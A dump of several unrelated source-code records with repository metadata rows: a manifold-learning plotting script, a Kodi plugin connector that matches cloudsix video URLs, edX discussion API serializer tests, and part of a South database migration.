pl.scatter(trans_data[0], trans_data[1], c=colors, cmap=pl.cm.rainbow)
pl.title("%s (%.2g sec)" % (labels[i], t1 - t0))
ax.xaxis.set_major_formatter(NullFormatter())
ax.yaxis.set_major_formatter(NullFormatter())
pl.axis('tight')
# Perform Isomap Manifold learning.
t0 = time()
trans_data = manifold.Isomap(n_neighbors, n_components=2)\
.fit_transform(sphere_data).T
t1 = time()
print("%s: %.2g sec" % ('ISO', t1 - t0))
ax = fig.add_subplot(246)
pl.scatter(trans_data[0], trans_data[1], c=colors, cmap=pl.cm.rainbow)
pl.title("%s (%.2g sec)" % ('Isomap', t1 - t0))
ax.xaxis.set_major_formatter(NullFormatter())
ax.yaxis.set_major_formatter(NullFormatter())
pl.axis('tight')
# Perform Multi-dimensional scaling.
t0 = time()
mds = manifold.MDS(2, max_iter=100, n_init=1)
trans_data = mds.fit_transform(sphere_data).T
t1 = time()
print("MDS: %.2g sec" % (t1 - t0))
ax = fig.add_subplot(247)
pl.scatter(trans_data[0], trans_data[1], c=colors, cmap=pl.cm.rainbow)
pl.title("MDS (%.2g sec)" % (t1 - t0))
ax.xaxis.set_major_formatter(NullFormatter())
ax.yaxis.set_major_formatter(NullFormatter())
pl.axis('tight')
# Perform Spectral Embedding.
t0 = time()
se = manifold.SpectralEmbedding(n_components=2,
n_neighbors=n_neighbors)
trans_data = se.fit_transform(sphere_data).T
t1 = time()
print("Spectral Embedding: %.2g sec" % (t1 - t0))
ax = fig.add_subplot(248)
pl.scatter(trans_data[0], trans_data[1], c=colors, cmap=pl.cm.rainbow)
pl.title("Spectral Embedding (%.2g sec)" % (t1 - t0))
ax.xaxis.set_major_formatter(NullFormatter())
ax.yaxis.set_major_formatter(NullFormatter())
pl.axis('tight')
pl.show()
| bsd-3-clause | 4,418,982,823,860,495,000 | 31.51773 | 75 | 0.679826 | false |
Mzero2010/MaxZone | plugin.video.Mzero/servers/cloudsix.py | 4 | 1449 | # -*- coding: utf-8 -*-
#------------------------------------------------------------
# pelisalacarta - XBMC Plugin
# Connector for cloudsix
# http://blog.tvalacarta.info/plugin-xbmc/pelisalacarta/
#------------------------------------------------------------
import re
from core import logger
def test_video_exists( page_url ):
logger.info("pelisalacarta.servers.cloudsix test_video_exists(page_url='%s')" % page_url)
return False,"Este servidor no es compatible con pelisalacarta"
def get_video_url( page_url , premium = False , user="" , password="", video_password="" ):
logger.info("pelisalacarta.servers.cloudsix get_video_url(page_url='%s')" % page_url)
video_urls = []
return video_urls
# Finds this server's videos in the given text
def find_videos(data):
encontrados = set()
devuelve = []
# http://cloudsix.me/users/abc/123/BlaBlaBla.cas
patronvideos = 'cloudsix.me/users/([^\/]+/\d+)'
logger.info("pelisalacarta.servers.cloudsix find_videos #"+patronvideos+"#")
matches = re.compile(patronvideos,re.DOTALL).findall(data)
for match in matches:
titulo = "[cloudsix]"
url = "http://cloudsix.me/users/"+match
if url not in encontrados:
logger.info(" url="+url)
devuelve.append( [ titulo , url , 'cloudsix' ] )
encontrados.add(url)
else:
logger.info(" url duplicada="+url)
return devuelve
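# Minimal usage sketch (hypothetical page text, for illustration only);
# it reuses the module's own logger and runs only when executed directly:
if __name__ == "__main__":
    sample_html = "links: http://cloudsix.me/users/abc/123/BlaBlaBla.avi"
    for titulo, url, servidor in find_videos(sample_html):
        logger.info("found %s -> %s" % (titulo, url))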
| gpl-3.0 | -7,217,112,036,263,297,000 | 32.674419 | 93 | 0.59116 | false |
nanolearningllc/edx-platform-cypress-2 | lms/djangoapps/discussion_api/tests/test_serializers.py | 21 | 33579 | """
Tests for Discussion API serializers
"""
import itertools
from urlparse import urlparse
import ddt
import httpretty
import mock
from django.test.client import RequestFactory
from discussion_api.serializers import CommentSerializer, ThreadSerializer, get_context
from discussion_api.tests.utils import (
CommentsServiceMockMixin,
make_minimal_cs_thread,
make_minimal_cs_comment,
)
from django_comment_common.models import (
FORUM_ROLE_ADMINISTRATOR,
FORUM_ROLE_COMMUNITY_TA,
FORUM_ROLE_MODERATOR,
FORUM_ROLE_STUDENT,
Role,
)
from lms.lib.comment_client.comment import Comment
from lms.lib.comment_client.thread import Thread
from student.tests.factories import UserFactory
from util.testing import UrlResetMixin
from xmodule.modulestore.tests.django_utils import SharedModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory
from openedx.core.djangoapps.course_groups.tests.helpers import CohortFactory
@ddt.ddt
class SerializerTestMixin(CommentsServiceMockMixin, UrlResetMixin):
@classmethod
@mock.patch.dict("django.conf.settings.FEATURES", {"ENABLE_DISCUSSION_SERVICE": True})
def setUpClass(cls):
super(SerializerTestMixin, cls).setUpClass()
cls.course = CourseFactory.create()
@mock.patch.dict("django.conf.settings.FEATURES", {"ENABLE_DISCUSSION_SERVICE": True})
def setUp(self):
super(SerializerTestMixin, self).setUp()
httpretty.reset()
httpretty.enable()
self.addCleanup(httpretty.disable)
self.maxDiff = None # pylint: disable=invalid-name
self.user = UserFactory.create()
self.register_get_user_response(self.user)
self.request = RequestFactory().get("/dummy")
self.request.user = self.user
self.author = UserFactory.create()
def create_role(self, role_name, users, course=None):
"""Create a Role in self.course with the given name and users"""
course = course or self.course
role = Role.objects.create(name=role_name, course_id=course.id)
role.users = users
@ddt.data(
(FORUM_ROLE_ADMINISTRATOR, True, False, True),
(FORUM_ROLE_ADMINISTRATOR, False, True, False),
(FORUM_ROLE_MODERATOR, True, False, True),
(FORUM_ROLE_MODERATOR, False, True, False),
(FORUM_ROLE_COMMUNITY_TA, True, False, True),
(FORUM_ROLE_COMMUNITY_TA, False, True, False),
(FORUM_ROLE_STUDENT, True, False, True),
(FORUM_ROLE_STUDENT, False, True, True),
)
@ddt.unpack
def test_anonymity(self, role_name, anonymous, anonymous_to_peers, expected_serialized_anonymous):
"""
Test that content is properly made anonymous.
Content should be anonymous iff the anonymous field is true or the
anonymous_to_peers field is true and the requester does not have a
privileged role.
role_name is the name of the requester's role.
anonymous is the value of the anonymous field in the content.
anonymous_to_peers is the value of the anonymous_to_peers field in the
content.
expected_serialized_anonymous is whether the content should actually be
anonymous in the API output when requested by a user with the given
role.
"""
self.create_role(role_name, [self.user])
serialized = self.serialize(
self.make_cs_content({"anonymous": anonymous, "anonymous_to_peers": anonymous_to_peers})
)
actual_serialized_anonymous = serialized["author"] is None
self.assertEqual(actual_serialized_anonymous, expected_serialized_anonymous)
@ddt.data(
(FORUM_ROLE_ADMINISTRATOR, False, "staff"),
(FORUM_ROLE_ADMINISTRATOR, True, None),
(FORUM_ROLE_MODERATOR, False, "staff"),
(FORUM_ROLE_MODERATOR, True, None),
(FORUM_ROLE_COMMUNITY_TA, False, "community_ta"),
(FORUM_ROLE_COMMUNITY_TA, True, None),
(FORUM_ROLE_STUDENT, False, None),
(FORUM_ROLE_STUDENT, True, None),
)
@ddt.unpack
def test_author_labels(self, role_name, anonymous, expected_label):
"""
Test correctness of the author_label field.
The label should be "staff", "staff", or "community_ta" for the
Administrator, Moderator, and Community TA roles, respectively, but
the label should not be present if the content is anonymous.
role_name is the name of the author's role.
anonymous is the value of the anonymous field in the content.
expected_label is the expected value of the author_label field in the
API output.
"""
self.create_role(role_name, [self.author])
serialized = self.serialize(self.make_cs_content({"anonymous": anonymous}))
self.assertEqual(serialized["author_label"], expected_label)
def test_abuse_flagged(self):
serialized = self.serialize(self.make_cs_content({"abuse_flaggers": [str(self.user.id)]}))
self.assertEqual(serialized["abuse_flagged"], True)
def test_voted(self):
thread_id = "test_thread"
self.register_get_user_response(self.user, upvoted_ids=[thread_id])
serialized = self.serialize(self.make_cs_content({"id": thread_id}))
self.assertEqual(serialized["voted"], True)
@ddt.ddt
class ThreadSerializerSerializationTest(SerializerTestMixin, SharedModuleStoreTestCase):
"""Tests for ThreadSerializer serialization."""
def make_cs_content(self, overrides):
"""
Create a thread with the given overrides, plus some useful test data.
"""
merged_overrides = {
"course_id": unicode(self.course.id),
"user_id": str(self.author.id),
"username": self.author.username,
"read": True,
"endorsed": True
}
merged_overrides.update(overrides)
return make_minimal_cs_thread(merged_overrides)
def serialize(self, thread):
"""
Create a serializer with an appropriate context and use it to serialize
the given thread, returning the result.
"""
return ThreadSerializer(thread, context=get_context(self.course, self.request)).data
def test_basic(self):
thread = {
"type": "thread",
"id": "test_thread",
"course_id": unicode(self.course.id),
"commentable_id": "test_topic",
"group_id": None,
"user_id": str(self.author.id),
"username": self.author.username,
"anonymous": False,
"anonymous_to_peers": False,
"created_at": "2015-04-28T00:00:00Z",
"updated_at": "2015-04-28T11:11:11Z",
"thread_type": "discussion",
"title": "Test Title",
"body": "Test body",
"pinned": True,
"closed": False,
"abuse_flaggers": [],
"votes": {"up_count": 4},
"comments_count": 5,
"unread_comments_count": 3,
"read": False,
"endorsed": False
}
expected = {
"id": "test_thread",
"course_id": unicode(self.course.id),
"topic_id": "test_topic",
"group_id": None,
"group_name": None,
"author": self.author.username,
"author_label": None,
"created_at": "2015-04-28T00:00:00Z",
"updated_at": "2015-04-28T11:11:11Z",
"type": "discussion",
"title": "Test Title",
"raw_body": "Test body",
"rendered_body": "<p>Test body</p>",
"pinned": True,
"closed": False,
"following": False,
"abuse_flagged": False,
"voted": False,
"vote_count": 4,
"comment_count": 5,
"unread_comment_count": 3,
"comment_list_url": "http://testserver/api/discussion/v1/comments/?thread_id=test_thread",
"endorsed_comment_list_url": None,
"non_endorsed_comment_list_url": None,
"editable_fields": ["abuse_flagged", "following", "voted"],
"read": False,
"has_endorsed": False
}
self.assertEqual(self.serialize(thread), expected)
thread["thread_type"] = "question"
expected.update({
"type": "question",
"comment_list_url": None,
"endorsed_comment_list_url": (
"http://testserver/api/discussion/v1/comments/?thread_id=test_thread&endorsed=True"
),
"non_endorsed_comment_list_url": (
"http://testserver/api/discussion/v1/comments/?thread_id=test_thread&endorsed=False"
),
})
self.assertEqual(self.serialize(thread), expected)
def test_pinned_missing(self):
"""
Make sure that older threads in the comments service without the pinned
field do not break serialization
"""
thread_data = self.make_cs_content({})
del thread_data["pinned"]
self.register_get_thread_response(thread_data)
serialized = self.serialize(Thread(id=thread_data["id"]))
self.assertEqual(serialized["pinned"], False)
def test_group(self):
cohort = CohortFactory.create(course_id=self.course.id)
serialized = self.serialize(self.make_cs_content({"group_id": cohort.id}))
self.assertEqual(serialized["group_id"], cohort.id)
self.assertEqual(serialized["group_name"], cohort.name)
def test_following(self):
thread_id = "test_thread"
self.register_get_user_response(self.user, subscribed_thread_ids=[thread_id])
serialized = self.serialize(self.make_cs_content({"id": thread_id}))
self.assertEqual(serialized["following"], True)
@ddt.ddt
class CommentSerializerTest(SerializerTestMixin, SharedModuleStoreTestCase):
"""Tests for CommentSerializer."""
def setUp(self):
super(CommentSerializerTest, self).setUp()
self.endorser = UserFactory.create()
self.endorsed_at = "2015-05-18T12:34:56Z"
def make_cs_content(self, overrides=None, with_endorsement=False):
"""
Create a comment with the given overrides, plus some useful test data.
"""
merged_overrides = {
"user_id": str(self.author.id),
"username": self.author.username
}
if with_endorsement:
merged_overrides["endorsement"] = {
"user_id": str(self.endorser.id),
"time": self.endorsed_at
}
merged_overrides.update(overrides or {})
return make_minimal_cs_comment(merged_overrides)
def serialize(self, comment, thread_data=None):
"""
Create a serializer with an appropriate context and use it to serialize
the given comment, returning the result.
"""
context = get_context(self.course, self.request, make_minimal_cs_thread(thread_data))
return CommentSerializer(comment, context=context).data
def test_basic(self):
comment = {
"type": "comment",
"id": "test_comment",
"thread_id": "test_thread",
"user_id": str(self.author.id),
"username": self.author.username,
"anonymous": False,
"anonymous_to_peers": False,
"created_at": "2015-04-28T00:00:00Z",
"updated_at": "2015-04-28T11:11:11Z",
"body": "Test body",
"endorsed": False,
"abuse_flaggers": [],
"votes": {"up_count": 4},
"children": [],
}
expected = {
"id": "test_comment",
"thread_id": "test_thread",
"parent_id": None,
"author": self.author.username,
"author_label": None,
"created_at": "2015-04-28T00:00:00Z",
"updated_at": "2015-04-28T11:11:11Z",
"raw_body": "Test body",
"rendered_body": "<p>Test body</p>",
"endorsed": False,
"endorsed_by": None,
"endorsed_by_label": None,
"endorsed_at": None,
"abuse_flagged": False,
"voted": False,
"vote_count": 4,
"children": [],
"editable_fields": ["abuse_flagged", "voted"],
}
self.assertEqual(self.serialize(comment), expected)
@ddt.data(
*itertools.product(
[
FORUM_ROLE_ADMINISTRATOR,
FORUM_ROLE_MODERATOR,
FORUM_ROLE_COMMUNITY_TA,
FORUM_ROLE_STUDENT,
],
[True, False]
)
)
@ddt.unpack
def test_endorsed_by(self, endorser_role_name, thread_anonymous):
"""
Test correctness of the endorsed_by field.
The endorser should be anonymous iff the thread is anonymous to the
requester, and the endorser is not a privileged user.
endorser_role_name is the name of the endorser's role.
thread_anonymous is the value of the anonymous field in the thread.
"""
self.create_role(endorser_role_name, [self.endorser])
serialized = self.serialize(
self.make_cs_content(with_endorsement=True),
thread_data={"anonymous": thread_anonymous}
)
actual_endorser_anonymous = serialized["endorsed_by"] is None
expected_endorser_anonymous = endorser_role_name == FORUM_ROLE_STUDENT and thread_anonymous
self.assertEqual(actual_endorser_anonymous, expected_endorser_anonymous)
@ddt.data(
(FORUM_ROLE_ADMINISTRATOR, "staff"),
(FORUM_ROLE_MODERATOR, "staff"),
(FORUM_ROLE_COMMUNITY_TA, "community_ta"),
(FORUM_ROLE_STUDENT, None),
)
@ddt.unpack
def test_endorsed_by_labels(self, role_name, expected_label):
"""
Test correctness of the endorsed_by_label field.
The label should be "staff", "staff", or "community_ta" for the
Administrator, Moderator, and Community TA roles, respectively.
role_name is the name of the author's role.
expected_label is the expected value of the author_label field in the
API output.
"""
self.create_role(role_name, [self.endorser])
serialized = self.serialize(self.make_cs_content(with_endorsement=True))
self.assertEqual(serialized["endorsed_by_label"], expected_label)
def test_endorsed_at(self):
serialized = self.serialize(self.make_cs_content(with_endorsement=True))
self.assertEqual(serialized["endorsed_at"], self.endorsed_at)
def test_children(self):
comment = self.make_cs_content({
"id": "test_root",
"children": [
self.make_cs_content({
"id": "test_child_1",
"parent_id": "test_root",
}),
self.make_cs_content({
"id": "test_child_2",
"parent_id": "test_root",
"children": [
self.make_cs_content({
"id": "test_grandchild",
"parent_id": "test_child_2"
})
],
}),
],
})
serialized = self.serialize(comment)
self.assertEqual(serialized["children"][0]["id"], "test_child_1")
self.assertEqual(serialized["children"][0]["parent_id"], "test_root")
self.assertEqual(serialized["children"][1]["id"], "test_child_2")
self.assertEqual(serialized["children"][1]["parent_id"], "test_root")
self.assertEqual(serialized["children"][1]["children"][0]["id"], "test_grandchild")
self.assertEqual(serialized["children"][1]["children"][0]["parent_id"], "test_child_2")
@ddt.ddt
class ThreadSerializerDeserializationTest(CommentsServiceMockMixin, UrlResetMixin, SharedModuleStoreTestCase):
"""Tests for ThreadSerializer deserialization."""
@classmethod
@mock.patch.dict("django.conf.settings.FEATURES", {"ENABLE_DISCUSSION_SERVICE": True})
def setUpClass(cls):
super(ThreadSerializerDeserializationTest, cls).setUpClass()
cls.course = CourseFactory.create()
@mock.patch.dict("django.conf.settings.FEATURES", {"ENABLE_DISCUSSION_SERVICE": True})
def setUp(self):
super(ThreadSerializerDeserializationTest, self).setUp()
httpretty.reset()
httpretty.enable()
self.addCleanup(httpretty.disable)
self.user = UserFactory.create()
self.register_get_user_response(self.user)
self.request = RequestFactory().get("/dummy")
self.request.user = self.user
self.minimal_data = {
"course_id": unicode(self.course.id),
"topic_id": "test_topic",
"type": "discussion",
"title": "Test Title",
"raw_body": "Test body",
}
self.existing_thread = Thread(**make_minimal_cs_thread({
"id": "existing_thread",
"course_id": unicode(self.course.id),
"commentable_id": "original_topic",
"thread_type": "discussion",
"title": "Original Title",
"body": "Original body",
"user_id": str(self.user.id),
"read": "False",
"endorsed": "False"
}))
def save_and_reserialize(self, data, instance=None):
"""
Create a serializer with the given data and (if updating) instance,
ensure that it is valid, save the result, and return the full thread
data from the serializer.
"""
serializer = ThreadSerializer(
instance,
data=data,
partial=(instance is not None),
context=get_context(self.course, self.request)
)
self.assertTrue(serializer.is_valid())
serializer.save()
return serializer.data
def test_create_minimal(self):
self.register_post_thread_response({"id": "test_id"})
saved = self.save_and_reserialize(self.minimal_data)
self.assertEqual(
urlparse(httpretty.last_request().path).path,
"/api/v1/test_topic/threads"
)
self.assertEqual(
httpretty.last_request().parsed_body,
{
"course_id": [unicode(self.course.id)],
"commentable_id": ["test_topic"],
"thread_type": ["discussion"],
"title": ["Test Title"],
"body": ["Test body"],
"user_id": [str(self.user.id)],
}
)
self.assertEqual(saved["id"], "test_id")
def test_create_all_fields(self):
self.register_post_thread_response({"id": "test_id"})
data = self.minimal_data.copy()
data["group_id"] = 42
self.save_and_reserialize(data)
self.assertEqual(
httpretty.last_request().parsed_body,
{
"course_id": [unicode(self.course.id)],
"commentable_id": ["test_topic"],
"thread_type": ["discussion"],
"title": ["Test Title"],
"body": ["Test body"],
"user_id": [str(self.user.id)],
"group_id": ["42"],
}
)
def test_create_missing_field(self):
for field in self.minimal_data:
data = self.minimal_data.copy()
data.pop(field)
serializer = ThreadSerializer(data=data)
self.assertFalse(serializer.is_valid())
self.assertEqual(
serializer.errors,
{field: ["This field is required."]}
)
@ddt.data("", " ")
def test_create_empty_string(self, value):
data = self.minimal_data.copy()
data.update({field: value for field in ["topic_id", "title", "raw_body"]})
serializer = ThreadSerializer(data=data, context=get_context(self.course, self.request))
self.assertEqual(
serializer.errors,
{field: ["This field is required."] for field in ["topic_id", "title", "raw_body"]}
)
def test_create_type(self):
self.register_post_thread_response({"id": "test_id"})
data = self.minimal_data.copy()
data["type"] = "question"
self.save_and_reserialize(data)
data["type"] = "invalid_type"
serializer = ThreadSerializer(data=data)
self.assertFalse(serializer.is_valid())
def test_update_empty(self):
self.register_put_thread_response(self.existing_thread.attributes)
self.save_and_reserialize({}, self.existing_thread)
self.assertEqual(
httpretty.last_request().parsed_body,
{
"course_id": [unicode(self.course.id)],
"commentable_id": ["original_topic"],
"thread_type": ["discussion"],
"title": ["Original Title"],
"body": ["Original body"],
"anonymous": ["False"],
"anonymous_to_peers": ["False"],
"closed": ["False"],
"pinned": ["False"],
"user_id": [str(self.user.id)],
}
)
def test_update_all(self):
self.register_put_thread_response(self.existing_thread.attributes)
data = {
"topic_id": "edited_topic",
"type": "question",
"title": "Edited Title",
"raw_body": "Edited body",
}
saved = self.save_and_reserialize(data, self.existing_thread)
self.assertEqual(
httpretty.last_request().parsed_body,
{
"course_id": [unicode(self.course.id)],
"commentable_id": ["edited_topic"],
"thread_type": ["question"],
"title": ["Edited Title"],
"body": ["Edited body"],
"anonymous": ["False"],
"anonymous_to_peers": ["False"],
"closed": ["False"],
"pinned": ["False"],
"user_id": [str(self.user.id)],
}
)
for key in data:
self.assertEqual(saved[key], data[key])
@ddt.data("", " ")
def test_update_empty_string(self, value):
serializer = ThreadSerializer(
self.existing_thread,
data={field: value for field in ["topic_id", "title", "raw_body"]},
partial=True,
context=get_context(self.course, self.request)
)
self.assertEqual(
serializer.errors,
{field: ["This field is required."] for field in ["topic_id", "title", "raw_body"]}
)
def test_update_course_id(self):
serializer = ThreadSerializer(
self.existing_thread,
data={"course_id": "some/other/course"},
partial=True,
context=get_context(self.course, self.request)
)
self.assertEqual(
serializer.errors,
{"course_id": ["This field is not allowed in an update."]}
)
@ddt.ddt
class CommentSerializerDeserializationTest(CommentsServiceMockMixin, SharedModuleStoreTestCase):
    """Tests for CommentSerializer deserialization."""
@classmethod
def setUpClass(cls):
super(CommentSerializerDeserializationTest, cls).setUpClass()
cls.course = CourseFactory.create()
def setUp(self):
super(CommentSerializerDeserializationTest, self).setUp()
httpretty.reset()
httpretty.enable()
self.addCleanup(httpretty.disable)
self.user = UserFactory.create()
self.register_get_user_response(self.user)
self.request = RequestFactory().get("/dummy")
self.request.user = self.user
self.minimal_data = {
"thread_id": "test_thread",
"raw_body": "Test body",
}
self.existing_comment = Comment(**make_minimal_cs_comment({
"id": "existing_comment",
"thread_id": "existing_thread",
"body": "Original body",
"user_id": str(self.user.id),
"course_id": unicode(self.course.id),
}))
def save_and_reserialize(self, data, instance=None):
"""
Create a serializer with the given data, ensure that it is valid, save
the result, and return the full comment data from the serializer.
"""
context = get_context(
self.course,
self.request,
make_minimal_cs_thread({"course_id": unicode(self.course.id)})
)
serializer = CommentSerializer(
instance,
data=data,
partial=(instance is not None),
context=context
)
self.assertTrue(serializer.is_valid())
serializer.save()
return serializer.data
@ddt.data(None, "test_parent")
def test_create_success(self, parent_id):
data = self.minimal_data.copy()
if parent_id:
data["parent_id"] = parent_id
self.register_get_comment_response({"thread_id": "test_thread", "id": parent_id})
self.register_post_comment_response(
{"id": "test_comment"},
thread_id="test_thread",
parent_id=parent_id
)
saved = self.save_and_reserialize(data)
expected_url = (
"/api/v1/comments/{}".format(parent_id) if parent_id else
"/api/v1/threads/test_thread/comments"
)
self.assertEqual(urlparse(httpretty.last_request().path).path, expected_url)
self.assertEqual(
httpretty.last_request().parsed_body,
{
"course_id": [unicode(self.course.id)],
"body": ["Test body"],
"user_id": [str(self.user.id)],
}
)
self.assertEqual(saved["id"], "test_comment")
self.assertEqual(saved["parent_id"], parent_id)
def test_create_all_fields(self):
data = self.minimal_data.copy()
data["parent_id"] = "test_parent"
data["endorsed"] = True
self.register_get_comment_response({"thread_id": "test_thread", "id": "test_parent"})
self.register_post_comment_response(
{"id": "test_comment"},
thread_id="test_thread",
parent_id="test_parent"
)
self.save_and_reserialize(data)
self.assertEqual(
httpretty.last_request().parsed_body,
{
"course_id": [unicode(self.course.id)],
"body": ["Test body"],
"user_id": [str(self.user.id)],
"endorsed": ["True"],
}
)
def test_create_parent_id_nonexistent(self):
self.register_get_comment_error_response("bad_parent", 404)
data = self.minimal_data.copy()
data["parent_id"] = "bad_parent"
context = get_context(self.course, self.request, make_minimal_cs_thread())
serializer = CommentSerializer(data=data, context=context)
self.assertFalse(serializer.is_valid())
self.assertEqual(
serializer.errors,
{
"non_field_errors": [
"parent_id does not identify a comment in the thread identified by thread_id."
]
}
)
def test_create_parent_id_wrong_thread(self):
self.register_get_comment_response({"thread_id": "different_thread", "id": "test_parent"})
data = self.minimal_data.copy()
data["parent_id"] = "test_parent"
context = get_context(self.course, self.request, make_minimal_cs_thread())
serializer = CommentSerializer(data=data, context=context)
self.assertFalse(serializer.is_valid())
self.assertEqual(
serializer.errors,
{
"non_field_errors": [
"parent_id does not identify a comment in the thread identified by thread_id."
]
}
)
@ddt.data(None, -1, 0, 2, 5)
def test_create_parent_id_too_deep(self, max_depth):
with mock.patch("django_comment_client.utils.MAX_COMMENT_DEPTH", max_depth):
data = self.minimal_data.copy()
context = get_context(self.course, self.request, make_minimal_cs_thread())
if max_depth is None or max_depth >= 0:
if max_depth != 0:
self.register_get_comment_response({
"id": "not_too_deep",
"thread_id": "test_thread",
"depth": max_depth - 1 if max_depth else 100
})
data["parent_id"] = "not_too_deep"
else:
data["parent_id"] = None
serializer = CommentSerializer(data=data, context=context)
self.assertTrue(serializer.is_valid(), serializer.errors)
if max_depth is not None:
if max_depth >= 0:
self.register_get_comment_response({
"id": "too_deep",
"thread_id": "test_thread",
"depth": max_depth
})
data["parent_id"] = "too_deep"
else:
data["parent_id"] = None
serializer = CommentSerializer(data=data, context=context)
self.assertFalse(serializer.is_valid())
self.assertEqual(serializer.errors, {"parent_id": ["Comment level is too deep."]})
def test_create_missing_field(self):
for field in self.minimal_data:
data = self.minimal_data.copy()
data.pop(field)
serializer = CommentSerializer(
data=data,
context=get_context(self.course, self.request, make_minimal_cs_thread())
)
self.assertFalse(serializer.is_valid())
self.assertEqual(
serializer.errors,
{field: ["This field is required."]}
)
def test_create_endorsed(self):
# TODO: The comments service doesn't populate the endorsement field on
# comment creation, so this is sadly realistic
self.register_post_comment_response({}, thread_id="test_thread")
data = self.minimal_data.copy()
data["endorsed"] = True
saved = self.save_and_reserialize(data)
self.assertEqual(
httpretty.last_request().parsed_body,
{
"course_id": [unicode(self.course.id)],
"body": ["Test body"],
"user_id": [str(self.user.id)],
"endorsed": ["True"],
}
)
self.assertTrue(saved["endorsed"])
self.assertIsNone(saved["endorsed_by"])
self.assertIsNone(saved["endorsed_by_label"])
self.assertIsNone(saved["endorsed_at"])
def test_update_empty(self):
self.register_put_comment_response(self.existing_comment.attributes)
self.save_and_reserialize({}, instance=self.existing_comment)
self.assertEqual(
httpretty.last_request().parsed_body,
{
"body": ["Original body"],
"course_id": [unicode(self.course.id)],
"user_id": [str(self.user.id)],
"anonymous": ["False"],
"anonymous_to_peers": ["False"],
"endorsed": ["False"],
}
)
def test_update_all(self):
cs_response_data = self.existing_comment.attributes.copy()
cs_response_data["endorsement"] = {
"user_id": str(self.user.id),
"time": "2015-06-05T00:00:00Z",
}
self.register_put_comment_response(cs_response_data)
data = {"raw_body": "Edited body", "endorsed": True}
saved = self.save_and_reserialize(data, instance=self.existing_comment)
self.assertEqual(
httpretty.last_request().parsed_body,
{
"body": ["Edited body"],
"course_id": [unicode(self.course.id)],
"user_id": [str(self.user.id)],
"anonymous": ["False"],
"anonymous_to_peers": ["False"],
"endorsed": ["True"],
"endorsement_user_id": [str(self.user.id)],
}
)
for key in data:
self.assertEqual(saved[key], data[key])
self.assertEqual(saved["endorsed_by"], self.user.username)
self.assertEqual(saved["endorsed_at"], "2015-06-05T00:00:00Z")
@ddt.data("", " ")
def test_update_empty_raw_body(self, value):
serializer = CommentSerializer(
self.existing_comment,
data={"raw_body": value},
partial=True,
context=get_context(self.course, self.request)
)
self.assertEqual(
serializer.errors,
{"raw_body": ["This field is required."]}
)
@ddt.data("thread_id", "parent_id")
def test_update_non_updatable(self, field):
serializer = CommentSerializer(
self.existing_comment,
data={field: "different_value"},
partial=True,
context=get_context(self.course, self.request)
)
self.assertEqual(
serializer.errors,
{field: ["This field is not allowed in an update."]}
)
| agpl-3.0 | -5,285,214,356,977,623,000 | 37.819653 | 110 | 0.564043 | false |
justintweaver/mtchi-cert-game | makahiki/apps/managers/challenge_mgr/migrations/0009_auto__del_field_challengesetting_location.py | 7 | 8591 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting field 'ChallengeSetting.location'
db.delete_column('challenge_mgr_challengesetting', 'location')
def backwards(self, orm):
# Adding field 'ChallengeSetting.location'
db.add_column('challenge_mgr_challengesetting', 'location', self.gf('django.db.models.fields.CharField')(default='', max_length=50), keep_default=False)
models = {
'challenge_mgr.challengesetting': {
'Meta': {'object_name': 'ChallengeSetting'},
'about_page_text': ('django.db.models.fields.TextField', [], {'default': '"For more information, please go to <a href=\'http://kukuicup.org\'>kukuicup.org</a>."'}),
'cas_auth_text': ('django.db.models.fields.TextField', [], {'default': "'###I have a CAS email'", 'max_length': '255'}),
'cas_server_url': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'contact_email': ('django.db.models.fields.CharField', [], {'default': "'[email protected]'", 'max_length': '100'}),
'domain': ('django.db.models.fields.CharField', [], {'default': "'localhost'", 'max_length': '100'}),
'email_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'email_host': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'email_port': ('django.db.models.fields.IntegerField', [], {'default': '587'}),
'email_use_tls': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'internal_auth_text': ('django.db.models.fields.TextField', [], {'default': "'###Others'", 'max_length': '255'}),
'landing_introduction': ('django.db.models.fields.TextField', [], {'default': "'Aloha! Welcome to the Kukui Cup.'", 'max_length': '500'}),
'landing_non_participant_text': ('django.db.models.fields.TextField', [], {'default': "'###I am not registered.'", 'max_length': '255'}),
'landing_participant_text': ('django.db.models.fields.TextField', [], {'default': "'###I am registered'", 'max_length': '255'}),
'landing_slogan': ('django.db.models.fields.TextField', [], {'default': "'The Kukui Cup: Lights off, game on!'", 'max_length': '255'}),
'ldap_auth_text': ('django.db.models.fields.TextField', [], {'default': "'###I have a LDAP email'", 'max_length': '255'}),
'ldap_search_base': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'ldap_server_url': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'default': "'Kukui Cup'", 'max_length': '50'}),
'team_label': ('django.db.models.fields.CharField', [], {'default': "'Team'", 'max_length': '50'}),
'theme': ('django.db.models.fields.CharField', [], {'default': "'theme-forest'", 'max_length': '50'}),
'use_cas_auth': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'use_internal_auth': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'use_ldap_auth': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'wattdepot_server_url': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'})
},
'challenge_mgr.gameinfo': {
'Meta': {'ordering': "['priority']", 'object_name': 'GameInfo'},
'enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'priority': ('django.db.models.fields.IntegerField', [], {'default': '1'})
},
'challenge_mgr.gamesetting': {
'Meta': {'ordering': "['game', 'widget']", 'unique_together': "(('game', 'widget'),)", 'object_name': 'GameSetting'},
'game': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['challenge_mgr.GameInfo']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
